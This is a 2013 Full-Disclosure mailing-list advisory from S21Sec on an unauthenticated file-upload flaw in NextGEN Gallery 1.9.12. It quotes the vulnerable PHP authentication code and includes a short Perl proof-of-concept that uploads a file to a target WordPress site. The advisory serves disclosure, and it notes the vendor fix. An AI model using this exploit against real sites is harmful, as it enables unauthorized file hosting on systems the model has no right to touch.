[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] [CVE-2013-3684] NextGEN Gallery 1.9.12 Arbitrary File Upload
- To: Full-Disclosure <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] [CVE-2013-3684] NextGEN Gallery 1.9.12 Arbitrary File Upload
- From: Marcos Agüero <maguero@xxxxxxxxxx>
- Date: Wed, 12 Jun 2013 16:51:29 +0200
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<tt>##############################################################<br>
<br>
<br>
- S21Sec Advisory -<br>
<br>
<br>
##############################################################<br>
<br>
Title: NextGEN Gallery 1.9.12 Arbitrary
File Upload<br>
ID: S21SEC-046-en<br>
CVE ID: CVE-2013-3684<br>
Severity: High<br>
Status: Fixed<br>
History: 27.May.2013 Vulnerability discovered<br>
28.May.2013 Vendor informed<br>
12.Jun.2013 Fix released<br>
Authors: Marcos Agüero (<a
class="moz-txt-link-abbreviated"
href="mailto:maguero@xxxxxxxxxx";>maguero@xxxxxxxxxx</a>)<br>
URL:
<a class="moz-txt-link-freetext"
href="http://www.s21sec.com/images/labs/advisories/s21sec-046-en.txt";>http://www.s21sec.com/images/labs/advisories/s21sec-046-en.txt</a><br>
Release: Public<br>
<br>
<br>
[ SUMMARY ]<br>
<br>
NextGEN Gallery is a WordPress gallery plugin that offers
sophisticated gallery management and <br>
displays. It's one of the most popular plugins ever produced for
WordPress, currently downloaded <br>
around 30,000 times per week.<br>
<br>
[ AFFECTED VERSIONS ]<br>
<br>
* NextGEN Gallery 1.9.12<br>
<br>
[ DESCRIPTION ]<br>
<br>
NextGEN Gallery allows file upload to unauthenticated users.
Filters in place only permits uploads <br>
of image files (extensions .gif, .png and .jpg). This avoids
scripts execution problems but an<br>
attacker could use the affected system to host files.<br>
<br>
Vulnerability occurs due an innapropiate cookie validation in
admin/upload.php script:<br>
<br>
if (wp_validate_auth_cookie()) {<br>
$results =
wp_parse_auth_cookie();<br>
$logged_in = FALSE;<br>
if (isset($results['username'])
&&
isset($results['expiration'])) {<br>
if (time()
< floatval($results['expiration'])) {<br>
if
(($userdata =
get_userdatabylogin($results['username'])))<br>
$logged_in = $userdata->ID;<br>
}<br>
}<br>
<br>
if (!$logged_in) die("Login
failure. -1");<br>
else if (!user_can($logged_in,
'NextGEN Upload images')) {<br>
die('You do
not have permission to upload files. -2');<br>
}<br>
} # VULN: No auth cookie is okay!<br>
<br>
This can be triggered by invoking 'nggupload' parameter on any
valid wordpress URL:<br>
<br>
ngggallery.php:<br>
<br>
// Handle upload requests<br>
add_action('init', array(&$this,
'handle_upload_request'));<br>
<br>
[...]<br>
function handle_upload_request()<br>
{<br>
if (isset($_GET['nggupload'])) {<br>
require_once(implode(DIRECTORY_SEPARATOR, array(<br>
NGGALLERY_ABSPATH,<br>
'admin',<br>
'upload.php'<br>
)));<br>
throw new
E_Clean_Exit();<br>
}<br>
}<br>
<br>
[ POC ]<br>
#! /usr/bin/perl<br>
use LWP;<br>
use HTTP::Request::Common;<br>
<br>
my ($url, $file) = @ARGV;<br>
<br>
my $ua = LWP::UserAgent->new();<br>
my $req = POST $url,<br>
Content_Type => 'form-data',<br>
Content => [ <br>
name =>
$name,<br>
galleryselect
=> 1, # Gallery ID, should
exist<br>
Filedata => [
"$file", "file.gif", Content_Type
=> 'image/gif' ]<br>
];<br>
my $res = $ua->request( $req );<br>
if( $res->is_success ) {<br>
print $res->content;<br>
} else {<br>
print $res->status_line, "\n";<br>
}<br>
<br>
[ SOLUTION ]<br>
<br>
Version 1.9.13 released by vendor.
<a class="moz-txt-link-freetext"
href="http://wordpress.org/plugins/nextgen-gallery/";>http://wordpress.org/plugins/nextgen-gallery/</a><br>
<br>
[ REFERENCES ]<br>
<br>
* S21Sec<br>
<a class="moz-txt-link-freetext"
href="http://www.s21sec.com";>http://www.s21sec.com</a><br>
<br>
</tt>
<div class="moz-signature">-- <br>
<div class="moz-signature">
<title>S21sec</title>
<style>
.Estilo1 {font-size: 11px}
.Estilo2 {font-size: 12px}
</style>
<div class="Section1">
<p class="MsoNormal"><b><span style="font-size:
10pt;font-family: Verdana;" lang="es-ES">Marcos
Agüero</span></b>
<span style="font-size: 11px; font-family: Verdana;"
lang="EN-GB"><br>
<em style="font-family: Verdana; color: rgb(221, 72, 20);">S21sec
ACSS</em> </span> <br>
<br>
<span style="font-size: 11px; font-family: Verdana;"> Tlf:
+34 902 222 521<br>
<br>
<a href="http://www.s21sec.com";
style="color:#dd4814">www.s21sec.com</a>,
<a href="http://blog.s21sec.com";
style="color:#dd4814">blog.s21sec.com</a>
<a href="http://securityblog.s21sec.com";
style="color:#dd4814">securityblog.s21sec.com</a> </span>
<br>
<br>
</p>
<p class="MsoNormal"><span style="font-size: 7.5pt;
font-family:Verdana; width:95%"> Salvo que se indique lo
contrario, esta información es CONFIDENCIAL y contiene
datos de carácter personal que han de ser tratados
conforme a la legislación vigente en materia de
protección
de datos. Si usted no es destinatario original de este
mensaje, le comunicamos que no está autorizado a revisar,
reenviar, distribuir, copiar o imprimir la información en
él contenida y le rogamos que proceda a borrarlo de sus
sistemas.<br>
<br>
Unless contrary indicated, this information is
CONFIDENTIAL and contains personal data that shall be
processed according to personal data protection law in
force. If you are not the named addressee of this message
you are hereby notified that any review, dissemination,
distribution, copying or printing of this message is
strictly prohibited and we urge you to delete it from your
Systems. <br>
<br>
<img src="cid:part4.05040106.06000600@s21sec.com"><font
color="#0B610B"> Antes de imprimir este mensaje valora
si verdaderamente es necesario. De esta forma
contribuimos a la preservación del Medio Ambiente.
</font></span><font
color="#0B610B"> </font> </p>
</div>
<font color="#0B610B"> </font></div>
</div>
</body>
</html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/